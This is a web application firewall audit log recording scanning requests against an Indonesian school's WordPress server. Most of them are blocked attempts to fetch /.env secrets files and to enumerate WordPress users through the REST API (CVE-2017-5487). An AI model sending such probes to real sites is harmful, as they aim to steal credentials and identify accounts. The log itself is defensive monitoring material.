Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e3e5033-Z-- --7309bf1e-A-- [28/May/2025:08:38:58 +0700] aDZpMuszXCullgn3bbGPEQAAAAs 103.236.140.4 33242 103.236.140.4 8181 --7309bf1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7309bf1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7309bf1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396338666719 841 (- - -) Stopwatch2: 1748396338666719 841; combined=337, p1=299, p2=0, p3=0, p4=0, p5=38, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7309bf1e-Z-- --80311462-A-- [28/May/2025:08:39:03 +0700] aDZpN-szXCullgn3bbGPEgAAAA4 103.236.140.4 33244 103.236.140.4 8181 --80311462-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --80311462-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80311462-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748396343579501 752 (- - -) Stopwatch2: 1748396343579501 752; combined=305, p1=268, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80311462-Z-- --fa170c67-A-- [28/May/2025:08:58:55 +0700] aDZt3xwBHP_x2VCWa05nVAAAAM8 103.236.140.4 33768 103.236.140.4 8181 --fa170c67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 209.124.100.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 209.124.100.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fa170c67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa170c67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748397535565708 3162 (- - -) Stopwatch2: 1748397535565708 3162; combined=1404, p1=482, p2=885, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa170c67-Z-- --377b865e-A-- [28/May/2025:09:07:42 +0700] aDZv7hwBHP_x2VCWa05nVQAAANA 103.236.140.4 33818 103.236.140.4 8181 --377b865e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 62.116.200.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 62.116.200.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --377b865e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --377b865e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748398062955727 3164 (- - -) Stopwatch2: 1748398062955727 3164; combined=1365, p1=485, p2=847, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --377b865e-Z-- --4d5d162d-A-- [28/May/2025:09:19:00 +0700] aDZylBwBHP_x2VCWa05qGwAAAM4 103.236.140.4 39296 103.236.140.4 8181 --4d5d162d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.74.223.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.74.223.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4d5d162d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d5d162d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748398740140225 2948 (- - -) Stopwatch2: 1748398740140225 2948; combined=1373, p1=430, p2=913, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d5d162d-Z-- --34f8085f-A-- [28/May/2025:09:23:48 +0700] aDZztPnnEwDNUSjDseIDMQAAAJE 103.236.140.4 42572 103.236.140.4 8181 --34f8085f-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --34f8085f-C-- õ¸examplecom --34f8085f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --34f8085f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399028752923 3474 (- - -) Stopwatch2: 1748399028752923 3474; combined=2201, p1=546, p2=1582, p3=23, p4=28, p5=22, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34f8085f-Z-- --b507d827-A-- [28/May/2025:09:23:49 +0700] aDZzteszXCullgn3bbGRdQAAAA4 103.236.140.4 42578 103.236.140.4 8181 --b507d827-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --b507d827-C-- ƒóexamplecom --b507d827-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b507d827-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029026918 2924 (- - -) Stopwatch2: 1748399029026918 2924; combined=2021, p1=459, p2=1496, p3=20, p4=22, p5=24, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b507d827-Z-- --9b12c124-A-- [28/May/2025:09:23:49 +0700] aDZztfnnEwDNUSjDseIDNgAAAIY 103.236.140.4 42588 103.236.140.4 8181 --9b12c124-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --9b12c124-C-- [>examplecom --9b12c124-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b12c124-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029590559 3206 (- - -) Stopwatch2: 1748399029590559 3206; combined=2099, p1=430, p2=1589, p3=26, p4=27, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b12c124-Z-- --76a9630f-A-- [28/May/2025:09:23:49 +0700] aDZztfnnEwDNUSjDseIDOgAAAIE 103.236.140.4 42598 103.236.140.4 8181 --76a9630f-B-- POST /query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --76a9630f-C-- Dzexamplecom --76a9630f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --76a9630f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399029863946 4164 (- - -) Stopwatch2: 1748399029863946 4164; combined=2746, p1=536, p2=2113, p3=33, p4=37, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76a9630f-Z-- --8d13656f-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDPgAAAJc 103.236.140.4 42608 103.236.140.4 8181 --8d13656f-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --8d13656f-C-- ñÍexamplecom --8d13656f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --8d13656f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030138573 3083 (- - -) Stopwatch2: 1748399030138573 3083; combined=2037, p1=433, p2=1536, p3=20, p4=23, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8d13656f-Z-- --d6e7c725-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDQwAAAJA 103.236.140.4 42622 103.236.140.4 8181 --d6e7c725-B-- POST /resolve HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --d6e7c725-C-- ¸¤examplecom --d6e7c725-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6e7c725-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030701490 3982 (- - -) Stopwatch2: 1748399030701490 3982; combined=2482, p1=534, p2=1864, p3=27, p4=31, p5=26, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6e7c725-Z-- --91148c00-A-- [28/May/2025:09:23:50 +0700] aDZztvnnEwDNUSjDseIDSAAAAI4 103.236.140.4 42636 103.236.140.4 8181 --91148c00-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --91148c00-C-- I*examplecom --91148c00-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --91148c00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399030982256 3473 (- - -) Stopwatch2: 1748399030982256 3473; combined=2203, p1=444, p2=1616, p3=27, p4=91, p5=25, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --91148c00-Z-- --f218bd08-A-- [28/May/2025:09:23:52 +0700] aDZzuPnnEwDNUSjDseIDTgAAAIk 103.236.140.4 42654 103.236.140.4 8181 --f218bd08-B-- POST / HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.211.162.45 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.211.162.45 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --f218bd08-C-- ƒ•examplecom --f218bd08-F-- HTTP/1.1 200 OK Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT ETag: "13cd-6034254946480" Accept-Ranges: bytes Content-Length: 5069 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html --f218bd08-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748399032809743 4642 (- - -) Stopwatch2: 1748399032809743 4642; combined=2794, p1=597, p2=2077, p3=43, p4=42, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f218bd08-Z-- --7204e810-A-- [28/May/2025:09:26:51 +0700] aDZ0aw3r-0gDryHAyD-v6QAAAEM 103.236.140.4 44852 103.236.140.4 8181 --7204e810-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 104.244.79.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 104.244.79.61 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --7204e810-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7204e810-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748399211805591 2247 (- - -) Stopwatch2: 1748399211805591 2247; combined=1030, p1=322, p2=677, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7204e810-Z-- --280e945c-A-- [28/May/2025:09:40:53 +0700] aDZ3tRwBHP_x2VCWa05vagAAAMk 103.236.140.4 55118 103.236.140.4 8181 --280e945c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 164.92.94.253 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 164.92.94.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --280e945c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --280e945c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748400053647521 1009 (- - -) Stopwatch2: 1748400053647521 1009; combined=414, p1=373, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --280e945c-Z-- --4cb9570d-A-- [28/May/2025:10:34:03 +0700] aDaEK_nnEwDNUSjDseIQ0AAAAIg 103.236.140.4 46258 103.236.140.4 8181 --4cb9570d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.60.252.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.60.252.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4cb9570d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cb9570d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748403243118191 3003 (- - -) Stopwatch2: 1748403243118191 3003; combined=1268, p1=406, p2=833, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cb9570d-Z-- --ec91720d-A-- [28/May/2025:10:35:40 +0700] aDaEjOszXCullgn3bbGhNwAAAAc 103.236.140.4 47794 103.236.140.4 8181 --ec91720d-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ec91720d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec91720d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748403340052791 755 (- - -) Stopwatch2: 1748403340052791 755; combined=290, p1=255, p2=0, p3=0, p4=0, p5=35, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec91720d-Z-- --2085ac37-A-- [28/May/2025:10:41:32 +0700] aDaF7OszXCullgn3bbGh4wAAABA 103.236.140.4 50632 103.236.140.4 8181 --2085ac37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.163.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.163.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2085ac37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2085ac37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748403692570119 2807 (- - -) Stopwatch2: 1748403692570119 2807; combined=1255, p1=436, p2=789, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
